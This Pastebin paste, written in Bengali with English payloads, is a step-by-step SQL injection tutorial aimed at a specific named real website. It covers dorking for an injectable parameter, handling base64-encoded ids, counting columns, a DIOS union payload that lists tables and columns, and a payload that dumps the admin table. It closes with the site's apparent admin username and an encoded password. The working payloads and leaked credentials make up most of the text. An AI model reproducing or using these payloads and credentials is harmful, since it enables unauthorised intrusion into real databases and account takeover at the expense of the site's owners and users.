Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- আজকে আমি দেখাবো base-64 Sql Injection!
- Target site:https://orionedutech.com/
- এখন dork দিয়ে ইঞ্জেকসন পয়েন্ট খুজবো....
- site:orionedutech.com .php?id=
- https://www.orionedutech.com/student_single.php?id=MjU=
- ইঞ্জেকশন পয়েন্ট!
- এখন MjU= কে base-64 ডিকোড করি
- https://www.orionedutech.com/student_single.php?id=25 <---এটি আসে
- https://www.orionedutech.com/student_single.php?id=25'<--এনকোড করে দেখলাম error আসে
- https://www.orionedutech.com/student_single.php?id=25'--+ <--এনকোড করে দেখলাম error fixed!
- বার বার এনকোড ডিকোড করা সমস্যা তাই আমরা একটি টেকনিক প্রয়োগ করবো!
- https://www.orionedutech.com/student_single.php?id=[BASE64]=25' order by 1-- -]
- [BASE64]=25' order by 1-- -] <--এটি দেওয়ায় আমরা এনকোড ডিকোডের ঝামেলা থেকে মুক্তি পেলাম!
- দেখবো কলাম সংখ্যা!
- https://www.orionedutech.com/student_single.php?id=[BASE64]=25' order by 6-- -]
- -->কলাম ৬ টি
- এখন vulnerable কলাম বের করবো!
- https://www.orionedutech.com/student_single.php?id=[BASE64]=-25' Union Select 1,2,3,4,5,6-- -] -->৩,৪,৫ নাম্বার কলাম vulnerable!
- এখন ৫ নম্বর কলামে DIOS করবো এবং [BASE64]= , ] এই ২টি remove করে দিবো এবং তা base-64 এনকোড করবো!
- https://www.orionedutech.com/student_single.php?id=25' Union Select 1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6-- - -->Encode
- https://www.orionedutech.com/student_single.php?id=MjUnIFVuaW9uIFNlbGVjdCAxLDIsMyw0LG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDYtLSAt
- ,admin,admin_name,
- ,admin,password,
- এখন admin টেবিল থেকে username এবং password ডাম্প করবো!
- https://www.orionedutech.com/student_single.php?id=-25' Union Select 1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_name,0x3a3a,password,0x3c62723e))))x),6-- - -->Encode and Execute!
- https://www.orionedutech.com/student_single.php?id=LTI1JyBVbmlvbiBTZWxlY3QgMSwyLDMsNCwoU0VMRUNUKEB4KUZST00oU0VMRUNUKEB4Oj0weDAwKSAsKFNFTEVDVChAeClGUk9NKGFkbWluKVdIRVJFKEB4KUlOKEB4Oj1DT05DQVQoMHgyMCxAeCxhZG1pbl9uYW1lLDB4M2EzYSxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDYtLSAt
- Username:admin
- Password:YWRtaW4xOTg0
- Done!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement